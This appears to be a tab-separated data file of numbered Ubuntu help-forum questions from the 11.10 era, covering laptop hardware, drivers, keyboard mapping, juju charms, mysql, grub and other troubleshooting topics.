80230	is there a fix for my thinkpad laptop mouse cursor from locking/freezing ?	on my thinkpad l420 laptop intel 2nd gen graphics i5 processor the mouse cursor freezes and locks up every so often . sometimes it 's as often as once every few minutes . the mouse cursor will freeze on the screen and i have to wait a few seconds ( sometimes 5+ ) for it to unfreeze . it 's a big problem and it happens only on ubuntu . it has been there in 11.10 , 11.04 , 10.04 ( possibly 10.04 not definite ) . it has to be related to the thinkpad because i never had this problem on a desktop , even with a wireless mouse . if i could fix this , i could have ubuntu up and running but for now i give booting to ubuntu .
80232	there is no `` on '' button showing in gnome shell extension	i have want to use user themes for gnome shell , but i am having troubles . i installed the user theme extension , but it does n't appear to show up under the gnome tweak tool . to confirm that i have the user themes extension installed , here is the feedback i get when i try to install it through terminal again :
80238	command line podcatcher with per-podcast automatic/nonautomatic download	is there a command line podcatcher that lets me configure some podcasts to be downloaded automatically and asks before downloading if other podcasts where updated depending on the configuration for each podcast ?
80239	powerpoint : remote pointing and slide track device	i think that this question may not be suitable for this forum . but i need your help . i am planning to buy a remote pointing ( not only just pointing , we will be able to track the slides ) device for my powerpoint presentations . i always use ubuntu and powerpoint with libreoffice impress . i have been looking products on amazon , most of them are either for windows or mac . i am not sure whether they will work on ubuntu . i think that at least some of of you have been using a device for presentations on ubuntu . it would be great if you share one that will work seamlessly with ubuntu . thanks .
80242	independent volume for headphones	i have an asus k52jc and in sound configuration there is no independent sound device for the headphones , and so there 's no way to have independent volume for speakers and headphones . is there a way to have independent devices ? or is this hardware specific ? lshw reports that i have an `` intel 5 series/3400 series chipset high definition audio '' . aplay -l reports : placa 0 : intel [ hda intel ] , dispositivo 0 : conexant analog [ conexant analog ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 placa 0 : intel [ hda intel ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0
80244	how do i sort by human readable sizes numerically ?	for example i have command that shows how much space folder takes du folder | sort -n it works great , however i would like to have human readable form du -h folder however if i do that than i can not sort it as numeric . how to join du folder and du -h folder to see output sorted as du folder , but with first column from du -h folder p.s . this is just an example . this technique might be very useful for me ( if its possible )
80245	cheese not working	when i launch cheese , nothing launches nor the green light on may laptop webcam glows . i typed cheese in terminal and i got cheese:2293 ) : gdk-warning ** : the program 'cheese ' received an x window system error . this probably reflects a bug in the program . the error was 'badrequest ( invalid request code or no such operation ) ' . ( details : serial 144 error_code 1 request_code 136 minor_code 19 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . )
80251	keyring on startup popup	every time when i reboot my pc keyring ask for password ! what i want to do is that i dont want to type password every time my pc start i want to to auto-login password and dont ask me for password & dont want to delete the login.keyring i want it to auto-login ( i think its abt ubuntu one > keyring ) keyring
80252	how to change keyboard sleep button to hibernate ?	i have a keyboard with a `` sleep '' button that does indeed make my computer go to sleep . the problem is that ubuntu ca n't really handle sleep on my computer , causing it go into a non-responsive mode , having the cpu fan spinning at full speed and it stops receiving any input . hibernation instead works mainly as it should . i would like to set the sleep key to hibernate , but the keyboard settings ' hotkeys tab does n't have this `` sleep '' keybinding and though i could make new one with hibernate -- force as the command , it would require root rights to run . how can i change the keyboard sleep button action to hibernate ?
80253	how do you install intel video drivers for a toshiba satellite a665-s6086 ?	need help installing intel video drivers on ubuntu 11.10 for a toshiba satellite a665-s6086 . nothing is showing in additional drivers and there does n't seem to be a whole lot on google . i 'm also fairly newbish with linux .
80254	how do i turn off caps lock ( the lock , not the key ) by command line ?	for some reason my laptop is stuck in caps lock . i have the caps lock key mapped by xmodmap to hyper_l , so i do n't have a caps_lock key to turn it off . is there a way i can turn it off by command line ? it would be nice if i could reset the lock state without resetting my computer , especially for future reference . this has happened before , but i would like to know now how to do it properly this time .
80260	wireless card mac not showing up	i installed ubuntu 10.11 on a dell inspiron e1505 . the broadcom driver is active , but the wireless card is n't being detected . there is no mac address in the wireless network configuration . ifconfig only shows the wired nic . any suggestions ?
80261	xmodmap works for gnome session , but not for apps ?	i 'm running ubuntu 11.10 using the gnome-fallback mode with compiz . my keyboard is the apple metal add-on usb keyboard . my .xmodmap file is set to swap the alt and command keys . i built the key map into a .xmodmap file , and it works successfully for the x session . ( i can do grid commands with ctrl-alt-number pad commands using the command key as the alt key . ) but none of the applications running under x recognize the new key mapping . ( command-f does n't open the file menu but option-f does . command-right-click does n't open the panel menu , but option-right-click does . ) how do i get my apps to pick up the new mod mapping ?
80263	open with > shell command gone and the ability to `` always open with ... ''	this question is sort of asked here , and no real answer is provided . there is a work around to get the program you want to show up in the list of `` other programs '' , but you still ca n't type in a shell command . the issue is with mplayer . i want to use the command line launched version of mplayer , not that windowed version which is just awful , but i do n't see a 'always open with ... ' option . is there any way to get that back ?
80266	acer timeline x 3830tg battery life	i 'm running ubuntu 11.10 and i 'm interested in getting more life out of my battery , i see a lot of people adding extra lines to their /etc/default/grub file after `` quiet splash '' . for instance one user suggested change grub_cmdline_linux_default to be : grub_cmdline_linux_default=”quiet splash pcie_aspm=force acpi_osi=linux i915.i915_enable_rc6=1″ this was for his acer aspire timelinex as4830tg-6450 , the hardware of the 4830tg differ only by the processor , his is the intel core i5-2430m 2.3ghz while mine is the intel core i5-2410m 2.3ghz are these changes model/hardware specific . what changes should i make to get the same results ( he noticed a big increase in battery life ) anything else i can do ? thank you
80269	can not escape character ' @ ' in fstab file	i want to attach remote ftp directory as a local directory in my system . i will use curlftpfs line in the fstab file , but to login i have to pass my user name and password . the user name has a special character ( @ ) and it needs to be escaped via octal ascii code . the octal ascii for ' @ ' is 100 . but when i try to enter the following into the fstab file , curlftpfs # myself\100myself.com : ftppassword @ ftp : //ftp.mysite.com /mnt/somedir i get an error saying error connecting to ftp : could n't resolve host 'myself.com : ftppassword @ ftp : //ftp.mysite.com' the fstab does not recognize escaped symbol @ ( \100 ) and thinks that the ftp site should start immediately after the @ symbol ( just like i have n't escaped it ) . can someone help ? why i can not escape @ , when it can be done for space character , for example ?
80271	firefox 9 ? ? where is the update for 8 ?	i was waiting for the ubuntu updates to deliver me the firefox 8 updates but today it delivered me with firefox 9 when it is not even released by mozilla ? am i having beta update ppa ? how can i know that ?
80272	how to force aptitude to display each search result in multiple lines ?	when i am using `` aptitude search '' , usually some results will be too long to be held in the console window . so are there any ways to display each result in multiple lines , so that i can see the full sentence ? thank you . snapshot :
80273	ca n't burn cd 's with brasero or k3b , it does n't see the cd	i was trying to burn an audio cd in brasero in ubuntu 11.10 64bit first and all it would do is let me burn an image file to the hard drive . so after i had no luck with it i decided to try k3b . i installed it and ended up with the same result to only burn an image . i have a new blank cdr in the drive but ubuntu itself , k3b , and brasero do not see the blank cdr in the drive . which i assume is why i ca n't burn to it.this is a cd/dvd burner and i have had no problems with it seeing and burning dvds . is there any way i can figure out what the problem is ? i tried the net for an answer and had no luck . thanks for any help on this issue .
80276	can i specify a port for certain ip address in ssh 's config ?	a ssh server on 192.168.1.45 listens on port 2222 . i know i can just add -p2222 or add an alias in ~/.bash_aliases , but is there a way to force a certain port when i ssh a specified ip ?
80278	how can i remove the suspend and hibernate options from the power menu ?	i want to get rid of the hibernate and suspend options on the top-right menu in unity . these do not work on my netbook and having them close to `` logout '' is not useful .
80285	asus f5r webcam shows black screen in skype and cheese , but works fine with vlc and camorama	i install new ubuntu 11.10 32bits version . install syntek webcam driver . install skype . try skype preferences video test and screen was black . next i read many forums and try ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype . nothing changed.where is the problem ?
80289	is it possible to view exactly what a package will install and where ?	if i want to install the tomcat6 package for example , would it be possible to see a list of files/directories of what/where this package will save ? also , can i see the actual debian package to learn from it ?
80293	moonlight extension not working with new firefox versions	the web browser i use is firefox ( currently in version 8 in oneiric ) . according the compatibility check information the moonlight extension is not compatible with ff8 . anyway , i enabled this extension using the addon compatibility reporter . and , actually , i can not watch silverlight streams in an acceptable way : the video gets stuck , the hd keeps buffering ( i guess ) , so i have to close the window . does anybody know if there is a way to fix this or a suitable alternative ? i 'm looking for something which is fully supported and mantained .
80297	thunderbird 8 changed default skin/theme - any way to change it back ?	i just updated to thunderbird 8 ( i use mozilla 's version , not ubuntu 's ) on ubuntu 11.04 ; and it seems it has changed its default skin/theme . not sure how it looks under other os ' , but under my ubuntu , thunderbird 7 looks like this : ... while thunderbird 8 looks like this : now , i 'm pretty sure some folks may appreciate the design change - but for me , i got so used to the old one , now everytime i start tb8 my first thought is `` what went wrong , why are the menubars extended , is it a buggy addon ? `` , and i start looking for ways to shorten them . so , is there a way to get back to the old design ( which would n't require rebuilding tb from source ) ?
80299	ubuntu hangs on shutdown	i recently upgraded from 11.04 to 11.10 . my machine now hangs during the shutdown process , but can reboot just fine . if i turn off quiet and splash boot options , then the following error is displayed : connection refusedid did not get the system bus . make sure the message bus daemon is running ! message : failed to connect to socket /var/run/debus/system [ fail ] o that is , the [ fail ] overwrites part of the error message . i am then dropped to a root shell . running shutdown now causes the same thing to happen . running reboot from here still succeeds . here 's what i 've tried so far : setting apci=off has no affect following the directions from this post gave fatal : module rt2860sta not found . following the directions from this post had no result , but stopped me from running reboot after being put in single-user mode ; now when i do this , i get an error saying /run/lock was not mounted , a message saying the system is going to restart , and then it hangs . i can still reboot from within ubuntu as before . any ideas on how to proceed ?
80303	my webcam wo n't work online	a tiny box pop up and asks me if i want to allow or decline something , and i click `` accept '' but nothing happens . the box keeps being there and just is there . is there any way to fix this ?
80304	what music is available on ubuntu one ?	is it possible to view which artists are available on ubuntu one music service without subscribing first ?
80305	ubuntu one sync has deleted a folder	i synced an important folder on my ubuntu machine with ubuntu one , and after a few minutes , stopped syncing the folder . after reboot , the entire folder is missing . this folder is supremely important . please help me
80310	finding the ip from the pid	right now , i 'm able to get the pid of a process from : ps aux|grep processname how can i get the port no/ip of the process ? there 's lsof and fuser for port to pid but is there another way to get the port from the pid ? i 've already posted this on stackoverflow but thought that this forum would be more appropriate . also i could n't migrate the question by myself . sorry for cross posting .
80315	script to automatically write file upon extracting some folder	i want to write script that will run in background and do following task : as soon as i extract `` xyz.tar.gz '' file to desktop it should write `` a.cpp '' file to desktop , and if a.cpp file already presents on desktop it should replace existing file..please help..stuck since hour..tar file name and file to be written are specific so it can hardcoded in script..
80316	my bcm 4311 wireless is not working . how can i fix this ?	hi i 've spent hours trying all the suggestions listed on forums on this problem all over the internet and i still ca n't get my wireless working . it 's very discouraging because it might force me to go back to windows which i hate . can someone help ? perhaps i can give you some information to help identify what the issue is ? b43 is n't coming up in my list of drivers ... just broadcom sta which does n't work . i think i 've removed all the blacklisted stuff .
80323	how can i test a juju charm ?	i have written a juju charm and want to test it . what are the steps to test it ?
80324	hdmi/vga connection cuts borders of screen or creates blurry text	ok this is an extension of another problem i had with a vga connection and an nvidia geforce gt 440 card . the question has been updated to include other problems related to hdmi video and also since i have confirmed that it also affects ati video cards . the explanation is the following : i have a soneview 32 ' tv . this tv has many connections including vga ( first reason i bought it ) , hdmi ( second reason but did not have a hdmi cable at that time ) and dvi . i have had this tv for little over a month now , actually i had it to celebrate the release of ubuntu 11.10 and started using it exactly on that date ( i know too much fan there but hey , i like geek stuff ) . i started using it with the vga cable . after 2 weeks i bought an nvidia gt440 card . the previous 9500gt which was using the vga connection was working correctly with no problems whatsoever . i installed the gt440 and the first problem that i encountered using this latest card is mentioned here : black screen on latest nvidia/ati cards when starting lightdm/ubuntu . the solution to this problem was to actually disconnect then connect again the vga cable . this would result in the screen showing me the lightdm screen for my login . if i did not disconnect then connect the cable i could be there forever thinking that there is no video signal . the black screen problem was solved in a later update for 12.04 and already solved using the default 12.10 . so using 12.04 and updating or using 12.10 solved the black screen with hdmi problem . i got tired of looking for answers that did not work and for solutions that made me literally have to install ubuntu again . i just went and bought an hdmi cable and changed the vga one for that one . it worked and i did not have to disconnect/connect the cable but now i have this problem when using any resolution . my normal resolution is 1920x1080 ( this tv is 1080hd ) so in vga i could use this resolution with no problem , but on hdmi am getting the borders cut out . here is a pic : as you can see from the image , the launcher icons only show less than 50 % of their width . forget about the top and bottom parts , i can access them with the mouse but i can not visualize them in the screen . it is like it 's outside of the tvs view . basically there is like 20 to 30 pixels gone from all sides . i searched around and came to running xrand -- verbose to see what it could detect from the tv . i got this : cyrex @ cyrex : ~ $ xrandr -- verbose xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 175 , current 1920 x 1080 , maximum 1920 x 1080 default connected 1920x1080+0+0 ( 0x164 ) normal ( normal ) 0mm x 0mm identifier : 0x163 timestamp : 465485 subpixel : unknown clones : crtc : 0 crtcs : 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 1920x1080 ( 0x164 ) 103.7mhz *current h : width 1920 start 0 end 0 total 1920 skew 0 clock 54.0khz v : height 1080 start 0 end 0 total 1080 clock 50.0hz 1920x1080 ( 0x165 ) 105.8mhz h : width 1920 start 0 end 0 total 1920 skew 0 clock 55.1khz v : height 1080 start 0 end 0 total 1080 clock 51.0hz 1920x1080 ( 0x166 ) 107.8mhz h : width 1920 start 0 end 0 total 1920 skew 0 clock 56.2khz v : height 1080 start 0 end 0 total 1080 clock 52.0hz 1920x1080 ( 0x167 ) 109.9mhz h : width 1920 start 0 end 0 total 1920 skew 0 clock 57.2khz v : height 1080 start 0 end 0 total 1080 clock 53.0hz 1920x1080 ( 0x168 ) 112.0mhz h : width 1920 start 0 end 0 total 1920 skew 0 clock 58.3khz v : height 1080 start 0 end 0 total 1080 clock 54.0hz 1920x1080 ( 0x169 ) 114.0mhz h : width 1920 start 0 end 0 total 1920 skew 0 clock 59.4khz v : height 1080 start 0 end 0 total 1080 clock 55.0hz 1680x1050 ( 0x16a ) 98.8mhz h : width 1680 start 0 end 0 total 1680 skew 0 clock 58.8khz v : height 1050 start 0 end 0 total 1050 clock 56.0hz 1680x1050 ( 0x16b ) 100.5mhz h : width 1680 start 0 end 0 total 1680 skew 0 clock 59.9khz v : height 1050 start 0 end 0 total 1050 clock 57.0hz 1600x1024 ( 0x16c ) 95.0mhz h : width 1600 start 0 end 0 total 1600 skew 0 clock 59.4khz v : height 1024 start 0 end 0 total 1024 clock 58.0hz 1440x900 ( 0x16d ) 76.5mhz h : width 1440 start 0 end 0 total 1440 skew 0 clock 53.1khz v : height 900 start 0 end 0 total 900 clock 59.0hz 1360x768 ( 0x171 ) 65.8mhz h : width 1360 start 0 end 0 total 1360 skew 0 clock 48.4khz v : height 768 start 0 end 0 total 768 clock 63.0hz 1360x768 ( 0x172 ) 66.8mhz h : width 1360 start 0 end 0 total 1360 skew 0 clock 49.2khz v : height 768 start 0 end 0 total 768 clock 64.0hz 1280x1024 ( 0x173 ) 85.2mhz h : width 1280 start 0 end 0 total 1280 skew 0 clock 66.6khz v : height 1024 start 0 end 0 total 1024 clock 65.0hz 1280x960 ( 0x176 ) 83.6mhz h : width 1280 start 0 end 0 total 1280 skew 0 clock 65.3khz v : height 960 start 0 end 0 total 960 clock 68.0hz 1280x960 ( 0x177 ) 84.8mhz h : width 1280 start 0 end 0 total 1280 skew 0 clock 66.2khz v : height 960 start 0 end 0 total 960 clock 69.0hz 1280x720 ( 0x178 ) 64.5mhz h : width 1280 start 0 end 0 total 1280 skew 0 clock 50.4khz v : height 720 start 0 end 0 total 720 clock 70.0hz 1280x720 ( 0x179 ) 65.4mhz h : width 1280 start 0 end 0 total 1280 skew 0 clock 51.1khz v : height 720 start 0 end 0 total 720 clock 71.0hz 1280x720 ( 0x17a ) 66.4mhz h : width 1280 start 0 end 0 total 1280 skew 0 clock 51.8khz v : height 720 start 0 end 0 total 720 clock 72.0hz 1152x864 ( 0x17b ) 72.7mhz h : width 1152 start 0 end 0 total 1152 skew 0 clock 63.1khz v : height 864 start 0 end 0 total 864 clock 73.0hz 1152x864 ( 0x17c ) 73.7mhz h : width 1152 start 0 end 0 total 1152 skew 0 clock 63.9khz v : height 864 start 0 end 0 total 864 clock 74.0hz ... .many resolutions later ... 320x200 ( 0x1d1 ) 10.2mhz h : width 320 start 0 end 0 total 320 skew 0 clock 31.8khz v : height 200 start 0 end 0 total 200 clock 159.0hz 320x175 ( 0x1d2 ) 9.0mhz h : width 320 start 0 end 0 total 320 skew 0 clock 28.0khz v : height 175 start 0 end 0 total 175 clock 160.0hz 1920x1080 ( 0x1dd ) 333.8mhz h : width 1920 start 0 end 0 total 1920 skew 0 clock 173.9khz v : height 1080 start 0 end 0 total 1080 clock 161.0hz if it helps , the refresh rate at 1920x1080 is 60 . there is a flickering effect at this resolution using hdmi but not vga which i imagine is related to the borders cut off issue am asking here .
80327	charm proof issues a `` relation server has no hooks '' warning	when i run charm proof < path_to_charm_folder > i get the following warning . w : relation server has no hooks what does this mean and how do i get rid of it ?
80328	can not boot win7 after updating to ubuntu 11.10	i had a dual boot setup on my system , with ubuntu 11.04 and win7 . yesterday i updated ubuntu to 11.10 . now , i can not seem to be able to load win7 , i do see an entry for it on the boot menu . i select that entry and then the screen goes black , with everything coming to a standstill . i tried to wait for it to respond but nothing happened . i went through the forums and tried `` grub-update '' but when i do that , nothing really happens . i am not sure of this , but i get no output from grub for upto 10 minutes ( can grub-update be made verbose ) how can i fix this and get back to booting both os'es properly ?
80329	can not execute iexplore.exe when i create a symbolic link to it	i do something like : $ ln -s '/home/deostroll/.wine/dosdevices/c : /program files/internet explorer/iexplore.exe ' /usr/bin/iexplore i am expecting that at the shell i can just type the following and expect the internet explorer browser window to show up : $ pwd < where ever > $ iexplore but instead i get the following error message : wine : can not find l '' z : \\usr\\bin\\iexplore . '' what am i doing wrong ?
80330	what is a juju charm ?	what is a juju charm ? what is it used for ?
80331	what tools are necessary to create a juju charm ?	what methods and tools supplied by ubuntu are necessary to create a juju charm ?
80334	upgrade process interrupted ; ca n't boot and need to recover protected data	i was using ubuntu 11.04 and upgrading to 11.10 . while the installation process was going on i shut it down . it ca n't come on again by itself . it will end up showing the status line `` checking battery status '' . the same problem is mentioned in crash after update to 11.10 , from 11.04 i have tried all my possibilities and all the commands i found in these discussion groups . the next possible solution is to newly install the os , but i need the data on my hard disk . as i have made them protected when opened with a livecd , there is an error saying `` you do not have the permission to access them . '' so i need to delete the administrator status through the terminal window . i can access my terminal window and run the sudo commands . so help me to delete the administrator status through the commands in the terminal window , please .
80340	static ip is configured and wired network . internet not working	i can ping other workstations from ubuntu 11.10 workstation . i can ping ubuntu 11.10 workstation from other workstations . but i ca n't ping gateway from ubuntu work station . /etc/resolv.conf have three nameserver saved even after several reboot . still unable to connect to internet . unable to ping or dig google.com unable to download packages using sudo apt-get update . i have an entry for eth0 configured in /etc/network/interfaces and also managed=true set in /etc/networkmanager/networkmanager.conf file . i really appreciate if you could tell me what am i doing wrong . thank you
80341	unable to mount virtualbox guest additions as a guest ( win7 host )	i keep getting this error dialog with an unable to mount error e_fail ( 0x80004005 ) when i try to mount guest additions : i tried the force unmount , but that just closes the dialog with no action taken . if i then reattempt to mount guest additions , i just get this same dialog box again . any help would be greatly appreciated !
80345	close minimize maximize in right side in ubuntu 11.10 unity	in ubuntu 11.10 ( unity ) , i want close minimize maximize button on right side of every window .
80351	update manager does not ask for password anymore	i have realized this behaviour recently . before that each time the update manager poped up to tell me there are updates and i tell it to install them it will ask me for a password . but since recently it does not do that anymore . when i click install it just downloads them and installs them . is this a bug or intended behaviour ? i use oneiric with latest updates if that helps
80355	how to start jenkins ?	i installed jenkins via sudo apt-get install jenkins . however , it does n't start up . tried to start it manually using sudo /etc/init.d/jenkins start . but it says this message when i try to start it that way : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.67 '' ( uid=1000 pid=7970 comm= '' start jenkins `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) '' init.d method just says starting , but never starts ... how do i fix this / get jenkins to start up ?
80356	fastest ubuntu version ?	oneiric is giving me a really bad performance at the moment and and i want i go back to a faster ubuntu version . would 10.04 give me a good performance ? ?
80359	why am i still using an older kernel version after upgrading ?	why is the kernel still at version 2.x after upgrading from ubuntu 11.04 to 11.10 ? i read that 11.10 has 3.x .
80363	combining git gui with the context menu ?	i just installed git and qgit for ubuntu and i want several features : to be able to see the hidden .git folder within folders . to be able to right-click a folder and say `` create a repository here '' ( as is available through tortoise git ) to be able to right-click a folder and open git on that place ( this can actually be done using `` open with '' - but i wondered if there is any other way ) this question might mix ubuntu general questions with git .
80366	can i remove kde applications from kubuntu ?	i just made the switch to kubuntu 11.10 and i 'm loving it ! but i have the annoyances of the software being on here . for starters , it comes with rekonq and kmail by default , so i installed firefox and thunderbird . can i uninstall rekonq and kmail and not mess up my kde desktop ? i saw something how it is all integrated into the system and i did n't want to mess up my new installation already .
80369	would zram increase my computer 's performance ?	this article says you can have increased performance in linux with zram ( virtual swap compressed in ram ) . i have 4 gb of ram , 2.93 ghz ( dual core ) & i use virtualization a lot ( vmware ) . would it be helpful to my computer 's performance to install zram ? i 'm using ubuntu 11.10 as my host and a vmware workstation for virtualization .
80371	bash history handling with multiple terminals	i use mainly terminator , and it 's usually opened with 3 split terminal windows . i also use gnome terminal for various reasons . i 'm wondering how is bash history handled in this case as i sometimes miss previously issued commands when i run history for example , my prompt shows current bash history line ( \ ! ) and if i launch terminator with 3 split terminal windows i get same history line ( let 's say 100 ) on all terminals . which history will be saved ? also launching gnome terminal after using terminator i get line 100 at startup regardless all commands issued before in terminator
80372	how to save installer file while downloading from ubuntu software center ?	can anyone tell me ( if this is possible ) how can i save the installer file of a software which i download via ubuntu software center ... i 'm new to ubuntu so give me answer that is understood by me .
80374	how can i log in to mysql	i am new to ubuntu and installed mysql use a rpm file , and started it use sudo start mysql , when i try mysqladmin -u root password test i get mysqladmin : connect to server at 'localhost ' failed error : 'ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) ' check that mysqld is running and that the socket : '/var/run/mysqld/mysqld.sock ' exists ! i checked the mysqld folder and there is nothing what can i do the next ? thanks for your answers
80379	how many ubuntu users are there worldwide ?	was just wondering if there is any solid data available as to how many people are using ubuntu . i was also interested in the attrition rate with ubuntu users , etc .
80384	where are the lxde sound preferences ?	i 'm confused , how can i change the sound output in lxde ? there 's not even a single option anywhere unlike other environments . i 've tried doing anything with alsamixerbut still nothing , the output device is the hdmi audio of a radeon hd card . edit : as it turns out i was able to change the ouput device , but i had to use gnome for that and its gnome sound applet , that is log out and log in once in gnome change the device , log out and log back in lxde . now the question becomes why ca n't i do this in lxde ?
80388	lost access to the unity interface how to fix ?	o.k , this is embarrassing : i have installed compiz config settings manager and tried to fix it so that the transition time between changing tabs ( using alt+tab ) will be short . by accident i un-pressed v from something else , and it asked me about a conflict - i pressed the `` x '' button to close the window and as a result i stopped seeing the unity interface . that is - i can not see any buttons of the left side . i went to the terminal ( ctrl+alt+f1 ) and ran ccsm as a result i got the following error : $ ccsm /usr/lib/python2.7/site-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) traceback ( most recent call last ) : file `` /usr/bin/ccsm '' , line 93 , in < module > import ccm file `` /usr/lib/python2.7/site-packages/ccm/__init__.py '' , line 1 , in < module > from ccm.conflicts import * file `` /usr/lib/python2.7/site-packages/ccm/conflicts.py '' , line 26 , in < module > from ccm.constants import * file `` /usr/lib/python2.7/site-packages/ccm/constants.py '' , line 29 , in < module > currentscreennum = gtk.gdk.display_get_default ( ) .get_default_screen ( ) .get_number ( ) attributeerror : 'nonetype ' object has no attribute 'get_default_screen' what should i do next ?
80390	is someone porting ubuntu one and software center for derivatives ?	since 12.04 is just around the corner , and the two main applications imo right now are the usc and u1 . due to that , is there any plan to port them completely into kubuntu , xubuntu and lubuntu ( also ubuntu studio.. but i think it 's already there.. ) ? i think it will add the much-needed ubuntu touch to those derivatives , so that they 'll have their own personality .
80394	should i install the ubuntu-restricted-extras package ?	i installed firefox beta 9 and the flash plugin as a .tar.gz file . i unpacked it , installed it and now i can watch youtube videos smoothly . but i want to play mp3 codecs and other restricted stuff on my laptop . should i uninstall the flash plugin for firefox or just install the ubuntu-restricted-extras package ( which contains everything i need ) ? if i install the package without uninstalling the plugin , will anything bad happen ?
80396	how does canonical report and transfer software center sales money to app developers ?	i would like to clarify some details of the derivation earned from the sale of application money . if i understood correctly , at the end of each quarter you will send us email to report the amount of earned us money . after that we will send you requisites on which you will send money by bank transfer . am i right ?
80402	broadcom bcm4312 not working	i have a hp mini 210-1010nr and just installed ubuntu 11.04 and i ca n't get my wireless to work . i have checked through multiple q & a 's throughout this faq and tried them all . when i go over the wireless thing at the top it says `` wireless networks device not ready ( firmware missing ) . '' okay , now here is my lspci -vvnn | grep 14e4 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) also , when i try to open additional drivers it says that `` downloading package indexes failed , please check your network status . '' i have no means of other internet access . i tried to do the ndisgtk things and attempted to install all of the things that were in the photo but i do n't know where to find them .
80407	restore sound configuration	after install some packages , i do n't have sound ! i installed rosegarden , vmpk ( piano software ) , drumstick virtual piano and timidity . at the beginning , all works fine , but when i reset my pc , i do n't listen anything . i would like how can i reinstall alsa . i want to have it completely new , all the settings by default , for example when ubuntu is installed .
80411	rosegarden do n't work	i recently installed rosegarden . when it had ran for the first time , it worked excellent . after , i had to restart my computer and when i ran it for the second time , something strange was occurred : according to the system monitor , rosegarden was running , in spite of i could n't see the application , sometimes it 's opened at other desktop and also unity always has some instability problems like disappear the title bar of other programs or a zone is marked ( for example , when we drag a window to the right side , we can see an `` orange '' area and the window 's size is reduced to distribute at the middle of the desktop ) at the left side of the screen and is n't hidden .
80419	how to change time servers ?	i 'm behind a firewall , so i ca n't access pool.ntp.org or ubuntu 's own time servers directly , and i 'd like to change the time servers for my system . when googling , i find references to missing manpages like ntpd.conf ( 5 ) and ntpd ( 8 ) , to a missing gui for setting the time servers , and to a cron script ( /etc/cron.daily/ntpdate ) that does n't seem to exist on my system . i 've also found a reference to there being changes to ntpd.conf , so i 'm hesitant to just create that file in /etc . how is one supposed to change the time servers in 11.10 ?
80421	ipv6 virtual network in linux	i 'm going to do a project based on ipv6 network . so i need to create a ipv6 virtual network in my linux os ( i use ubuntu ) . also i need to create some virtual hosts in my virtual network and setup static ips ( local ips ) for each and every host . and i need to run a terminal on each virtual host . can i setup that kind of an environment on my linux os ? please give me some help to do this . thank you !
80422	difference between commands	what is the difference between the following ? sudo apt-get update sudo apt-get upgrade and dpkg -- get-selections | grep -v deinstall > ubuntu-files plus sudo dpkg -- set-selections < ./ubuntu-files sudo apt-get -y update sudo apt-get -u dselect-upgrade
80431	day of week in digital clock plasmoid	i have problem with configuring digital clock plasmoid : i ca n't display day of week in it . as far as i remember it was simle in previous distr versions . will be glad for help . thanks !
80434	installing windows vista after installed ubuntu 11.10 oneiric	i installed windows vista and ubuntu 11.10 oneiric . now i need to reinstall windows vista . is it possible to install windows without ubuntu reinstalling ?
80440	no skype notification when ringing when on different desktop	i am using ubuntu 11.10 . i logged into skype ( waiting for a call ) and then switched to another desktop to do some work . when the call did n't come through as expected , i switched back to the desktop window where skype was open and i noticed that a skype call had actually been made to me but i had missed it . there was no skype ring tone or answer/cancel panel when i was on the different desktop window . is this a skype issue or an ubuntu anomaly ?
80441	install grub on another partition	hey i want to install ubuntu 11.10 outside windows but i want that the default boot loader to be used is window 's one.also will it be possible to insert the boot location of ubuntu after removing grub into windows bootloader
80444	how to set user passwords using passwd without a prompt ?	i am writing a script to add a large amount of users to a system . part of this involves setting default passwords for each user . how can i set users ' passwords without it prompting me for the password up front ? unfortunately passwd does n't seem to take an argument stating the new password to set . i 'm using ubuntu 11.10 .
80448	what would cause the `` gi '' module to be missing from python ?	after some not so clever editing of the default python version in ubuntu , from 2.7 to 3.2 , i ended up breaking my entire system . after my computer imploded and everything stopped working , i tried to revert back my changes ( by linking /usr/bin/python2.7 to /usr/bin/python and changing the default version in /usr/share/python/debian_defaults back to 2.7 ) but some things are still broken . for example when i type `` import gi '' in the python interpreter i get the fallowing message : > > > import gi traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named gi > > > error which appears with some programs too ( eg : gnome tweak tool ) . i have tried re-installing python both from the software center and from sources , but the same error persists . python -- version now returns : python 2.7.2 and also some software packages which depend on python 2.7 are now working ( for example the software center ) , but some things are still broken . is there anything i can do to completely re-install python 2.7 as the default version ?
80449	how do i set ctrl not to show where the pointer is ?	after recently re-installing , i went through every system setting and choose exactly how i wanted everthing to be . except one thing . i 'd never seen the show cursor on ctrl value before , and wanted to know what it was like . after a while it was simply annoying , whenever i paste of cut in chrome it takes the focus off of the text before i can press v. i have been through eveything in system settings and ca n't find it again to disable it . how do i set ctrl not to pulse around the cursor ? i will be happy with directions in system settings , ubuntu tweak , or gconf .
80454	is there a quick way to enter uppercase accented characters ?	i know i can enter any character i need using the character-map applet , but that means grabbing the mouse/opening the `` run '' dialog , switching to another window , selecting the character , copying ... you get the idea . is there a quicker way to enter characters that are not available on the keyboard ( and are not available as alt-gr combinations ) ? in my specific case i 'm using a laptop with the italian keyboard layout , but i suspect a general solution exists .
